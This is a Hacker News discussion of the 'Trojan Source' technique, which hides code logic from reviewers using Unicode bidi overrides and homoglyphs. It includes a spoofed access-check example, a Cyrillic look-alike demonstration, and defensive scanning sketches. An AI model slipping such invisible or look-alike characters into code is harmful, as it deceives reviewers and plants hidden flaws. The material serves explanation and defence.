Unless I misunderstand the premise, this is not right. The compiler is not "tricked" into doing anything different - it interprets the code the same way as it always did. It's like saying "rm" command "can be tricked into" deleting important files. The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code. It would correctly compile any code that is syntactically correct - if there are strings inside that look weird to you, it doesn't matter to the compiler.

The entity that can be "tricked" here is the reviewer of the code - who, indeed, might probably be tricked into accepting code that does something different than they'd think it does (though it'd require a very clever attacker for the code to both do something nefarious with Unicode and still look innocent and not weird to the reviewer). Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources (proper code would have localizable resources outside the code anyway, tbh) and no Unicode would ever trick you.

__alexs | karma 2585 | avg karma 3.13 2021-11-01 03:42:58 | [–] similar comments

> Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources

There are plenty of projects out there written by people who aren't English speakers who depend on the Unicode capabilities of languages to write code that is actually readable to them. Turning that off is far from a solution.

ivanhoe | karma 4341 | avg karma 2.79 2021-11-01 04:11:17 | [–] similar comments

Does anyone actually do that in a production code?

I myself am not native English speaker and use unicode when writing in my mother tongue, but in 20+ years of programming I've never seen anyone using non-ascii chars in their professionally written code? Of course, you use the language in localization files, and perhaps in comments occasionally - especially in TODO stuff that's not meant to be permanent - but not in the actual code, like e.g. for a variable or function names.

I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

Cthulhu_ | karma 26640 | avg karma 2.23 2021-11-01 04:25:27 | [–] similar comments

It's a very western / Anglosphere attitude, and I think you underestimate how much code is produced in e.g. China and Japan nowadays, with comments in their native language.

How would you name a FooBarWicket if you don't speak a word of English?

I mean don't get me wrong, ideally everybody writes code in perfect English and sticks to a set of ~50 ascii characters, but it's not an ideal world and you have to keep other languages and cultures in mind.

amenod | karma 1544 | avg karma 2.66 2021-11-01 04:36:13 | [–] similar comments

I would argue that even if you decide that you are using some other language and not English, there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase. Bidi override control characters are clearly not among them, whichever language you choose.

rbanffy | karma 158565 | avg karma 2.97 2021-11-01 06:45:07 | [–] similar comments

> Bidi override control characters are clearly not among them, whichever language you choose.

Not sure how would you write a comment in an RTL human language in the middle of LTR code without it. Lots of people learn to write RTL languages well before writing any code.

What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

Now, bidi overrides in identifier names is a nightmare I’d prefer to avoid.

amenod | karma 1544 | avg karma 2.66 2021-11-01 09:55:01 | [–] similar comments

The same way as you write a comment in a LTR human language in the middle of RTL code - you don't. You stick to either LTR or RTL. This is code, not prose.

rbanffy | karma 158565 | avg karma 2.97 2021-11-02 07:19:52 | [–] similar comments

Code is meant to be read and, occasionally, executed. Comments are usually ignored by compilers and are targeted towards humans.

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-01 12:49:14 | [–] similar comments

You do not actually need the bidi override control character to put a comment in an RTL language in the middle of LTR code.

You only need it if you are doing this, and the default Unicode algorithm for guessing LTR/RTL boundaries gets it wrong, so you need to override with an explicit bidi override control. I'm not even sure how feasible that is to do in current editor/IDE environments developers who have this use case might use.

I am genuinely curious how often these sorts of situations come up in actual development.

> What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

I don't understand what you mean or how that's even possible, for the kinds of attacks discussed in OP.

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-01 17:07:15 | [–] similar comments

Btw here's proof. Here is ltr text and rtl ??????? text ???? interspersed with no bidi override control characters to be found.

Unicode can handle this, it has a heuristic algorithm for it. Note how if you try to select the text character-by-character, your selection does funny things at the rtl to ltr boundaries, because the byte order doesn't match the order on the screen. It really is handling the directionality changes, with the letters entered in "order" across changes, there is no funny entry or ordering going on, this is plain old normal unicode handling interspersed directionality changes just fine, with no bidi overrides.

It just sometimes gets it wrong for the intent of the author. Especially when there are characters at the boundaries that are themselves not strongly associated as rtl or ltr (like ordinary "western arabic numerals" or punctuation). That's what the bidi override control char is for.
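
For anyone who wants to see which characters count as strongly directional, Python's standard `unicodedata.bidirectional` returns the bidi class the Unicode algorithm starts from. This is just an inspection sketch; `bidi_classes` is a made-up helper name and the sample string is arbitrary.

```python
import unicodedata


def bidi_classes(text: str):
    """Pair each character's code point with its Unicode bidirectional class."""
    return [(f"U+{ord(ch):04X}", unicodedata.bidirectional(ch)) for ch in text]


# Latin letter, Hebrew letter, European digit, space, exclamation mark,
# and the right-to-left override control.
sample = "a\u05D01 !\u202E"
for code_point, bidi_class in bidi_classes(sample):
    print(code_point, bidi_class)
```

The letters come back as `L` and `R` (strong), while the digit, space and punctuation come back as `EN`, `WS` and `ON`. Those take their direction from context, which is where the default resolution can differ from what the author meant.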

WalterBright | karma 71923 | avg karma 2.96 2021-11-01 14:45:45 | [–] similar comments

> Not sure how would you write a comment in an RTL human language

Siht ekil.

chmod775 | karma 11930 | avg karma 4.66 2021-11-01 06:58:56 | [–] similar comments

> there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase

It's not even remotely well-defined, and probably never will be. Also, as long as we keep adding to unicode, you will need to keep your whitelist of code points updated.

You can however find a well-defined subset of characters that can be allowed.

In either case you'd be essentially excluding entire languages.

amenod | karma 1544 | avg karma 2.66 2021-11-01 09:50:23 | [–] similar comments

You misunderstood my point:

>> There is only ... that should ever be allowed...

What I am saying is someone decides to code in a non-english language (which is completely reasonable) they should define a subset of unicode characters that is acceptable. Additionally, the allowed characters should not permit tricks like these.

As for excluding entire languages... well, yes. This is already the case today. But OTOH it's not like understanding what "if" means gives you any special advantage in programming.

worrycue | karma 1377 | avg karma 2.01 2021-11-01 04:47:29 | [–] similar comments

I still wonder though, just how much production non-comment source code is not written in the ASCII character set.

The libraries of most programming languages (developed in the west) are in ASCII - frameworks and middleware too. Have people in countries like Japan and China actually translated all of that code - renaming functions, classes, and variable names to their native tongue in Unicode - or do they just learn the English names (they are all nouns/pronouns and at most simple phrases so translation should not be too difficult; they don’t have to understand English grammar).

Moru | karma 3002 | avg karma 1.74 2021-11-01 05:27:03 | [–] similar comments

Microsoft translated all the commands in the scripting language for Excel to native language, making it totally impossible to use for anyone. You can't even google it because the help is so split up in different languages.

Zababa | karma 5670 | avg karma 1.79 2021-11-01 07:21:53 | [–] similar comments

Not only the commands, the separator too. In some languages, it's FUNCTION(arg1, arg2), in some others it's FONCTION(arg1; arg2)

Moru | karma 3002 | avg karma 1.74 2021-11-03 07:28:23 | [–] similar comments

Ah yes, Swedish was one of those languages I think. I can't imagine a worse thing to do with a programming language...

ivanhoe | karma 4341 | avg karma 2.79 2021-11-01 05:03:06 | [–] similar comments

Well, what you call an Anglosphere attitude is a reality of learning in a majority of non-english speaking countries: There's simply not enough resources for learning in your own language.

China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time. It's not anything new as a concept, nor I see it as damaging for local cultures in any way - back in my University days I've learned myself some Russian so that I could read their physics and chemistry books which were excellent and way cheaper and easier for me to get than those from the West. One day I'll have no problem learning some Chinese if (or more likely when?) they become the referent source of knowledge.

__alexs | karma 2585 | avg karma 3.13 2021-11-01 11:41:38 | [–] similar comments

> China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way,

Having worked with some large software teams in China my experience was that most people could speak a bit of English (but generally didn't want to) and were nowhere near at the level needed to actually design and write software in English.

If we forced them to do everything in English quality was terrible and everything took ages, but if we let them write in Mandarin things were much better.

notJim | karma 6527 | avg karma 3.41 2021-11-01 11:59:06 | [–] similar comments

> it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time.

Why would they need to learn English to do those things? I'm sure there are Chinese-language tech news sites, and Chinese-language documentation.

dmz73 | karma 402 | avg karma 2.27 2021-11-01 06:36:24 | [–] similar comments

When you code for yourself, write what you want. If you write to collaborate then use English/ASCII. Imagine international aviation if they allowed the same BS that people in IT allow and now even try to promote - everyone talking their own language and not understanding each other - we would have planes colliding and crashing all over the place.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:16:37 | [–] similar comments

Aviation requires real-time communication; it's not a great analogy, I don't think.

Aeolun | karma 23207 | avg karma 2.16 2021-11-01 09:10:30 | [–] similar comments

We used to have that, with exactly the result you describe. Which is why it was changed.

We’ll get there eventually with software, but it generally doesn’t kill people so there’s less incentive.

Aeolun | karma 23207 | avg karma 2.16 2021-11-01 09:08:04 | [–] similar comments

> How would you name a FooBarWicket if you don't speak a word of English?

How would you learn how to make a FooBarWicket without knowing a word of English? Any programming language's control constructs are almost by definition English.

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-01 12:47:02 | [–] similar comments

Agreed, but I'm still curious (and don't know the answer) how often someone actually needs to put a "Bidi override" in a comment... if I were a language designer I'd be tempted to just say they aren't allowed in comments or identifiers or anywhere but string literals/data, and have the compiler/interpreter just reject it.

(I have used a bidi override before myself, for non-malicious purposes!)

account42 | karma 5969 | avg karma 0.98 2021-11-02 09:48:26 | [–] similar comments

> anywhere but string literals/data

The examples [0] posted in this thread have the bidi characters inside a string literal.

[0] https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-02 17:41:46 | [–] similar comments

I'm not sure what they are being posted as examples of there? Can a bidi char in a string literal be successfully used in the sort of attack in the OP, a "Trojan Source" attack?

If so, that is devious!

It's not clear to me if those examples show that though. They show bidi characters being highlighted in a string literal, right?

My hypothesis was that such could not be part of a "trojan source" attack... but this stuff is confusing and I could have it wrong?

Piskvorrr | karma 5073 | avg karma 1.42 2021-11-01 04:44:22 | [–] similar comments

I can attest that it happens, even in (natural) languages that use Latin scripts. Sure, "just use en.US-ASCII" is a mitigation, and most (Euroamerican) code follows this; the bug extends to string literals however ("they don't end where you see them // this is actually not part of the string; return;"), so a different approach is needed.

Const-me | karma 5797 | avg karma 1.88 2021-11-01 04:45:31 | [–] similar comments

Professionally made GUI software needs Unicode even when English localized, for typography.

Proper quotes, proper dashes (ASCII doesn't have a dash character, it only has minus), non-breakable space, soft hyphen, € character, Greek letters like π and µ, etc.

jdavis703 | karma 7391 | avg karma 2.93 2021-11-01 05:15:00 | [–] similar comments

Most of these should be in a separate file for i18n, not directly in the source code.

Const-me | karma 5797 | avg karma 1.88 2021-11-01 05:29:31 | [–] similar comments

Internationalization is not limited to putting strings into a table in a resource. It also needs a non-trivial amount of code. Printing numbers into strings is code not data. Yet if you want the numbers to look good, like "600 µm" or "6×10⁻⁴ meters", you gonna have Unicode in code, not the resources.
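
As a sketch of why such formatting ends up as code rather than data, here is one hypothetical way to print a value in scientific notation with a real multiplication sign and superscript exponent. `format_scientific` and `SUPERSCRIPTS` are names invented for this example.

```python
# Translation table from ASCII minus/digits to their Unicode superscript forms.
SUPERSCRIPTS = str.maketrans("-0123456789", "⁻⁰¹²³⁴⁵⁶⁷⁸⁹")


def format_scientific(value: float, unit: str) -> str:
    """Format value as mantissa×10^exponent using Unicode superscripts."""
    mantissa, exponent = f"{value:e}".split("e")
    # Drop trailing zeros (and a dangling decimal point) from the mantissa.
    mantissa = mantissa.rstrip("0").rstrip(".")
    # int() removes the sign padding and leading zeros, e.g. "-04" -> -4.
    exponent = str(int(exponent)).translate(SUPERSCRIPTS)
    return f"{mantissa}×10{exponent} {unit}"


print(format_scientific(0.0006, "meters"))
```

The non-ASCII characters here live in the formatting logic itself, so moving them into a string table would not remove them from the source.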

Another thing, not every software needs i18n. Depends on the market. I'm yet to see a C++ compiler which would localize their output messages.

kzrdude | karma 11414 | avg karma 2.35 2021-11-01 08:45:50 | [–] similar comments

GCC supports localization, that's one C++ compiler.

Intel C++ compiler seems to have a Japanese version (not tried).

jdavis703 | karma 7391 | avg karma 2.93 2021-11-01 09:08:58 | [–] similar comments

“Meters” is an English word, and a string like “600 µm” should still probably be extracted from the code as “%d µm.”

Const-me | karma 5797 | avg karma 1.88 2021-11-01 12:01:13 | [–] similar comments

Still, there are also strings like “6·10⁻⁴”

fstrthnscnd | karma 35 | avg karma 0.76 2021-11-01 04:58:03 | [–] similar comments

> Does anyone actually do that in a production code?

Would you accept teaching code as production code? Specifically, if you were to teach programming to young non English speakers, wouldn't you accept them to use words of their native tongue for variables and such?

> I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

Wouldn't you say that solely using roman letters in code would impose a similar limit? In countries where these letters are seldom used (like for instance greek letters in western countries), only those accustomed to them would be able to handle code (as it has been the case until the last decade perhaps).

Bayart | karma 3538 | avg karma 2.6 2021-11-01 10:37:56 | [–] similar comments

I've definitely seen it done, in both code I was adjacent to and code I was pulling from outside. I have vivid memories of stumbling on a lib doing seemingly what I needed but with all comments in Chinese and variables/funcs in Pinyin.

smsm42 | karma 17167 | avg karma 2.28 2021-11-01 11:57:58 | [–] similar comments

Can you give an example? I've never seen a project (outside domains on APL, etc.) that seriously relied on any Unicode capabilities in the code itself (again, I am not talking about localized strings). My native language is not English, I've worked with people all over Europe, China, India, Japan, Israel, etc. - there are a lot of exciting i18n/l10n problems but I have never seen much of what a compiler would need to be concerned with.

klohto | karma 1976 | avg karma 3.74 2021-11-01 03:50:33 | [–] similar comments

You argue away your own fix. Proposed fix is like if rm was limited to files outside of /sys, plenty of projects depend on the standardized behavior.

robin_reala | karma 63921 | avg karma 9.98 2021-11-01 03:53:45 | [–] similar comments

APL developers would disagree.

smsm42 | karma 17167 | avg karma 2.28 2021-11-02 14:26:27 | [–] similar comments

For people that spend their days reviewing APL code, the concerns of mere mortals are not important.

Sebb767 | karma 7572 | avg karma 3.75 2021-11-01 07:02:35 | [–] similar comments

> The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code.

This is actually no longer true. Many rm implementations today prevent you from deleting a path including the root directory, unless you explicitly specify `--no-preserve-root`. Similarly, a lot of compilers tend to warn you or outright stop if they detect code that is very likely to be buggy - the rust compiler warning about these control characters is just the latest example.

Of course, in theory, each tool should do its job and the user should be the boundary to know what's right. In practice, though, these heuristics tend to catch bugs-to-be 95% of the time (at least in my experience) and are easily disabled otherwise, so they are good to have.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:19:20 | [–] similar comments

I couldn't care less about my root directory. The only things I care about are the motherboard firmware and the /home directory, and nothing prevents `rm` from deleting those.

The `--one-file-system` or `--preserve-root=all` flags are more useful than `--preserve-root`, but they're not defaults. (For a good reason: compatibility.)

ComodoHacker | karma 3183 | avg karma 2.05 2021-11-01 03:04:54 | [–] similar comments

The paper: https://www.trojansource.codes/trojan-source.pdf

zeepzeep | karma 905 | avg karma 3.44 2021-11-01 03:31:38 | [–] similar comments

The good old SexyHexe.pdf strikes again.

These problems won't go away for a while, unicode is fucking hard. Almost every app I ever tried had at least some problems with %u202E (the right-to-left override).

jeroenhd | karma 24884 | avg karma 4.06 2021-11-01 03:31:55 | [–] similar comments

It all depends on your IDE. I've tried this, and IntelliJ and friends will show a little block with the text RLO for the right-to-left override or ZWS for zero-width space for any non-standard character that might mess things up. (Neo)vim will show the Unicode escape sequence instead of rendering the text as Unicode directs it.

Some compilers, notably clang, will warn you that you're using an "invisible character". Assuming you at least read the warnings your code generates (because if you don't, why not just put exploitable algorithms deep down in the software?) you'd probably catch the issue.

Simpler programs such as the text editor that ships with GNOME will freak out, but I don't think most people are coding in that in the first place.

I think this is an interesting peculiarity, but it's not a "threat" to "the security of all code".

aulin | karma 831 | avg karma 2.26 2021-11-01 03:48:15 | [–] similar comments

I'd say that neovim is bugged here and gedit is the one working properly rendering unicode as it should be

aww_dang | karma 3027 | avg karma 1.41 2021-11-01 03:40:03 | [–] similar comments

I filed this domain away under 'security alarmist nonsense' years ago. This headline and story are prime examples of the form.

sydthrowaway | karma 748 | avg karma 1.01 2021-11-01 08:21:16 | [–] similar comments

Seriously. State run espionage is 100x more likely

TruthWillHurt | karma 191 | avg karma 0.64 2021-11-01 03:48:16 | [–] similar comments

Is this a real cause for concern? Simply don't copy code with strange unicode characters, just like you don't copy code with blocks of bytecode.

samus | karma 1894 | avg karma 1.18 2021-11-01 05:20:45 | [–] similar comments

It's a problem in any environment where people can input Unicode characters. Reviewers might use tools that are not able to see those things.

At the same time, one can't just put a blanket ban on Unicode. It exists for a reason. People want to use their native languages to name identifiers, or at least to write comments. Restricting ourselves to ASCII again and thus forcing English on everybody is not a solution.

lixtra | karma 2274 | avg karma 2.5 2021-11-01 09:57:27 | [–] similar comments

> Restricting ourselves to ASCII again and thus forcing English on everybody is not a solution.

Yet most programming languages force them to use English Arabic numbers.

Wouldn’t it be great to use Roman numerals?

And then images in source code are really difficult to handle. Wouldn’t it be nice to compile a word document with embedded images?

I think I wouldn’t mind staying with ASCII for source code, except for string literals (difficult enough).

samus | karma 1894 | avg karma 1.18 2021-11-02 01:45:26 | [–] similar comments

Arabic numerals can be justified since they are dominant and most commonly used in modern science and technology across the whole world. Supporting additional systems would not introduce too much hassle though. Numbers follow a rigid syntax and generally do not employ free mixing with numerals from other systems.

What I have in mind actually exists already: Jupyter notebooks, which combine code, text, and resources into a nice JSON ball. Horrible for SCMs and editors without using special plugins of course.

mkl | karma 11432 | avg karma 2.64 2021-11-01 06:20:04 | [–] similar comments

The point of the vulnerability is that you can't necessarily see the strange Unicode characters.
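
Since the characters may not show up on screen, a mechanical scan is one way to find them. Below is a minimal Python sketch. The set of code points (the bidi embedding, override and isolate controls) is an assumption about what is worth flagging, and `find_bidi_controls` is a hypothetical name.

```python
# Bidi embedding/override/isolate controls and their usual abbreviations.
BIDI_CONTROLS = {
    "\u202A": "LRE",
    "\u202B": "RLE",
    "\u202C": "PDF",
    "\u202D": "LRO",
    "\u202E": "RLO",
    "\u2066": "LRI",
    "\u2067": "RLI",
    "\u2068": "FSI",
    "\u2069": "PDI",
}


def find_bidi_controls(source: str):
    """Return (line, column, abbreviation) for each bidi control in source."""
    hits = []
    for line_no, line in enumerate(source.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((line_no, col, BIDI_CONTROLS[ch]))
    return hits


# Made-up two-line input with one override and one isolate.
print(find_bidi_controls('a = "x\u202E"\nb\u2066'))
```

Something like this could run as a pre-commit or CI check, so the result does not depend on how any one reviewer's tool renders the file.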

pitdicker | karma 265 | avg karma 5.3 2021-11-01 03:52:49 | [–] similar comments

Security advisory for the Rust programming language (with a nice explanation): https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html

Rust 1.56.1 will be released later today.

> To assess the security of the ecosystem we analyzed all crate versions ever published on crates.io (as of 2021-10-17), and only 5 crates have the affected codepoints in their source code, with none of the occurrences being malicious.

Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png

robin_reala | karma 63921 | avg karma 9.98 2021-11-01 04:10:01 | [–] similar comments

That’s a really impressively written error message.

sodality2 | karma 3858 | avg karma 3.38 2021-11-01 05:23:52 | [–] similar comments

That's one of Rust's selling points. For all I've used the rust compiler, not once have I ever not known what error it was pointing out: its error messages are incredibly helpful. Occasionally I am unsure why it's an error, but I always know what it's referring to and what I could do to fix it.

Timwi | karma 455 | avg karma 1.93 2021-11-01 06:03:18 | [–] similar comments

I've had the same experience with C#. The error messages always state exactly what's wrong and where in the code it's wrong. Many of them (especially compiler _warnings_ intended to point out syntax that is almost certainly a bug) also tell you how to fix it (e.g. “consider using ‘new’ keyword if hiding was intended”).

hermitdev | karma 3521 | avg karma 2.51 2021-11-01 14:50:48 | [–] similar comments

Personally, I don't know why the last one (“consider using ‘new’ keyword if hiding was intended”) isn't an error by default in C# . Not overriding the base method is almost always a mistake, and if it's not a mistake, better to be explicit about it, anyways. My $.02...

joosters | karma 15062 | avg karma 4.78 2021-11-01 04:10:10 | [–] similar comments

Their advisory is well-written and explains the problem well. The example code they use:

  if access_level != "user" { // Check if admin

opens up a whole can of worms though. You don't need cunning invisible control codes to break that line, you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit. Even better, this would be a completely deniable attack ("oops, I must have accidentally pressed alt-R while typing that letter" excuse) - whereas explaining away why you checked in some magical RTL/LTR encodings and hacked up a comment is impossible. Plus, it would render well in far more apps, terminals, command line programs, etc etc
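
A quick Python sketch of the homoglyph variant, using a Cyrillic letter as the stand-in (my choice for illustration, any look-alike would do). `non_ascii_report` is a hypothetical helper.

```python
import unicodedata

latin = "user"
# Same word, but with U+0435 (a Cyrillic letter) in place of the Latin "e".
spoofed = "us\u0435r"

# The two strings look alike in many fonts yet compare as different.
print(latin == spoofed)


def non_ascii_report(s: str):
    """List (index, code point, Unicode name) for every non-ASCII character."""
    return [
        (i, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>"))
        for i, ch in enumerate(s)
        if ord(ch) > 127
    ]


print(non_ascii_report(spoofed))
```

A comparison against the spoofed literal never matches the real "user" value, which is what makes the swap exploitable in a check like the one above.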

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 04:15:01 | [–] similar comments

This stuff has always been there. Consider this code:

if (uid = NULL) { // Check if root

And if you’re using clang: if ((uid = NULL)) { // Check if root

I'd venture that this is far more dangerous than unicode in strings...

or how about:

strcpy()

or #include anything with a #DEFINE

fstrthnscnd | karma 35 | avg karma 0.76 2021-11-01 04:43:17 | [–] similar comments

> if (uid = NULL) { // Check if root

That's not the same class of error, since here a programmer can see the issue by simple inspection.

> or #include anything with a #DEFINE

This one perhaps is closer to the mark, although not based on unicode.

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 15:26:11 | [–] similar comments

To me it's the same class of error which is convincing humans and other automated tests that your code is OK when it isn't.

I dealt with a bug that only appeared in release builds, and never in debug. The offending code looked roughly like this:

  if (blah)
    #ifdef DEBUG
    baz();
    #endif
  bar();

The systemic problem was it was a project created by interns, and they'd review each other's code. By the time the bug got to me the interns had left and a Sr Dev had spent a day looking for the bug. It took me an hour to find it. In isolation it's easy to see but in the mess of all the other code, you really have to look for these things.

fstrthnscnd | karma 35 | avg karma 0.76 2021-11-02 11:28:55 | [–] similar comments

Well, if you generalize the statement enough, indeed it's the same class of issue.

In the situation you described:

* you have a fairly easy way to detect the problem

* the interns still have plausible deniability as to whether they intended to leave a defect or not

The problem discussed is clearly meant to be used as an exploit, the likelihood of this problem occurring by accident seems very close to zero.

capitainenemo | karma 1398 | avg karma 2.4 2021-11-01 09:44:39 | [–] similar comments

Rust doesn't allow assignment in conditionals.

https://locka99.gitbooks.io/a-guide-to-porting-c-to-rust/con...

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 15:31:18 | [–] similar comments

It does, in fact the article you posted, shows you exactly when rust allows assignment in conditionals.

As long as you're initializing a variable, it's allowed, if you're not initializing you'll have to use a block expression.

capitainenemo | karma 1398 | avg karma 2.4 2021-11-01 16:21:01 | [–] similar comments

Should have just used this sentence - which also directly covers parent's case.

"Rust does not allow assignment within simple expressions so they will fail to compile. This is done to prevent subtle errors with = being used instead of ==."

Better?

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:29:44 | [–] similar comments

Those are all detectable by a programmer's eyes. Unicode attacks are not.

ace112 | karma 3 | avg karma 3.0 2021-11-01 04:36:54 | [–] similar comments

Ooh, or you could just put in the cyrillic '?' and even have it look like it's legit :)

codesections | karma 2576 | avg karma 8.2 2021-11-01 04:55:48 | [–] similar comments

> you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit.

The post mentions that exploit (and Rust's already existing defense) in the appendix.

Here are the details, as explained in a previous post:

> The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

    warning: identifier pair considered confusable between `ｓ` and `s`

https://blog.rust-lang.org/2021/06/17/Rust-1.53.0.html

lol768 | karma 4765 | avg karma 4.8 2021-11-01 05:39:13 | [–] similar comments

Am I missing something here? The spacing around these homoglyph is almost always noticeably wider than it should be such that I don't understand how you could ever miss it in any half-decent code review.

      if access_level != "user" { // Check if admin

      if access_level != "user" { // Check if admin

Come on, that looks obviously off.

hug | karma 2606 | avg karma 4.93 2021-11-01 05:47:28 | [–] similar comments

I th?nk th?t ?t ?s poss?bl? th?t you ?re missing ? f??rly important point.

... And that point is that none of the vowels in my previous sentence are latin, I guess.

mkl | karma 11432 | avg karma 2.64 2021-11-01 05:59:48 | [–] similar comments

I think you missed some. I can't seem to paste your fake "i"s back in, but here's what I see:

  $ xxd
  I th?nk th?t ?t ?s poss?bl? th?t you ?re missing ? f??rly important point.
  00000000: 4920 7468 d196 6e6b 2074 68d0 b074 20d1  I th..nk th..t .
  00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0  .t ..s poss..bl.
  00000020: b520 7468 d0b0 7420 796f 7520 d0b0 7265  . th..t you ..re
  00000030: 206d 6973 7369 6e67 20d0 b020 66d0 b0d1   missing .. f...
  00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070  .rly important p
  00000050: 6f69 6e74 2e0a                           oint..
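
The same check can be done without xxd. This Python sketch decodes the hex bytes copied from the dump above and counts the non-ASCII characters by name. Only standard-library calls are used; the variable names are mine.

```python
import unicodedata
from collections import Counter

# Hex columns copied from the dump above (offsets and ASCII column omitted).
HEX_DUMP = """
4920 7468 d196 6e6b 2074 68d0 b074 20d1
9674 20d1 9673 2070 6f73 73d1 9662 6cd0
b520 7468 d0b0 7420 796f 7520 d0b0 7265
206d 6973 7369 6e67 20d0 b020 66d0 b0d1
9672 6c79 2069 6d70 6f72 7461 6e74 2070
6f69 6e74 2e0a
"""

# Remove all whitespace, turn the hex digits into bytes, then decode as UTF-8.
text = bytes.fromhex("".join(HEX_DUMP.split())).decode("utf-8")

# Count every character outside ASCII and print it with its Unicode name.
counts = Counter(ch for ch in text if ord(ch) > 127)
for ch, n in sorted(counts.items()):
    print(f"U+{ord(ch):04X} {unicodedata.name(ch)} x{n}")
```

Every two-byte sequence starting with d0 or d1 in the dump is one Cyrillic letter. The plain 0x69 bytes in "missing", "important" and "point" are ordinary Latin "i".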

hug | karma 2606 | avg karma 4.93 2021-11-01 06:03:05 | [–] similar comments

Made you look. :)

I also skipped a bunch of the "I"s.

mkl | karma 11432 | avg karma 2.64 2021-11-01 06:09:30 | [–] similar comments

Yes. What browser did you use to make the comment? I can't get all those characters to paste in.

hug | karma 2606 | avg karma 4.93 2021-11-01 06:11:52 | [–] similar comments

Firefox 93.0 on Windows 11. Characters copied & pasted from charmap.exe

а: U+0430 "Cyrillic small letter a"

е: U+0435 "Cyrillic small letter ie"

і: U+0456 "Cyrillic small letter Byelorussian-Ukrainian i"

nonameiguess | karma 6174 | avg karma 2.71 2021-11-01 07:20:36 | [–] similar comments

If you were really reviewing that code, Rust has algebraic data types, and access level should be an Enum, not a String.

But it's their example. The problem isn't with homoglyphs, though. It's with bidi control characters, which are invisible to a human but not to the compiler, which is how generated code can end up semantically different from source code, which is the actual problem here. What you see in code review would be the first line, even though that isn't actually what is in the source, because an editor that is bidi-aware would show it that way.

steveklabnik | karma 91260 | avg karma 5.08 2021-11-01 12:19:54 | [–] similar comments

> But it's their example

It's the example that the researchers provided to us, to be clear about it.

lol768 | karma 4765 | avg karma 4.8 2021-11-05 06:51:33 | [–] similar comments

> It's with bidi control characters

Sure.. in the original HN submission. I was referring to Rust's built-in homoglyph detection though, which is what the parent comment (and its parent) was about.

joosters | karma 15062 | avg karma 4.78 2021-11-01 06:13:51 | [–] similar comments

The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

Unfortunately, I've little experience of rust, so I don't have experience of that warning. It would certainly help catch a one-liner exploit, but wouldn't it be excessively noisy for code written in non-english languages?

wongarsu | karma 24397 | avg karma 4.14 2021-11-01 07:00:49 | [–] similar comments

It only warns if there actually are two identifiers that look similar. Even if it's not malicious it's still confusing and is worth renaming.

But if you want to, turning off specific warnings for a file or block of code is really simple in rust, just add "#[allow(confusable_idents)]"

estebank | karma 4736 | avg karma 3.39 2021-11-01 13:08:39 | [–] similar comments

The Unicode homoglyph lint will only trigger if there are multiple identifiers that can look the same, it's not a blanket warning on anything that isn't ASCII. It's close to what browsers do with domain names. And you can always allow lints.
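
To illustrate the "only triggers on pairs" behaviour, here is a rough Python sketch. It is not rustc's implementation; the `LOOKALIKES` table is a tiny hand-picked assumption, whereas a real check would use the full confusables data from Unicode Technical Standard #39:

```python
from collections import defaultdict

# Tiny hand-picked table for illustration only (an assumption, not real data).
LOOKALIKES = {
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u0456": "i",  # Cyrillic small Byelorussian-Ukrainian i
    "\u043e": "o",  # Cyrillic small o
    "\u0441": "c",  # Cyrillic small es
}

def skeleton(identifier):
    """Map each known look-alike to its Latin twin; leave other characters alone."""
    return "".join(LOOKALIKES.get(ch, ch) for ch in identifier)

def confusable_groups(identifiers):
    """Return groups of distinct identifiers that share a skeleton."""
    groups = defaultdict(set)
    for ident in identifiers:
        groups[skeleton(ident)].add(ident)
    return [sorted(group) for group in groups.values() if len(group) > 1]
```

A lone non-ASCII identifier produces no group; only `user` next to `us\u0435r` (Cyrillic "е") would be reported.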

est31 | karma 15854 | avg karma 4.44 2021-11-01 07:41:36 | [–] similar comments

> warning: identifier pair considered confusable

Note that the lint you mention is about identifiers, while "user" is a literal. The lint does not fire for literals. String literals have always supported non ascii characters since 1.0.0, and there has never been a lint for them, until now with the 1.56.1 release.

estebank | karma 4736 | avg karma 3.39 2021-11-01 12:04:45 | [–] similar comments

Also worth noting that the homoglyph attack isn't linted for in literals or comments, only the bidi codepoints are.

littlestymaar | karma 8278 | avg karma 1.96 2021-11-01 04:09:22 | [–] similar comments

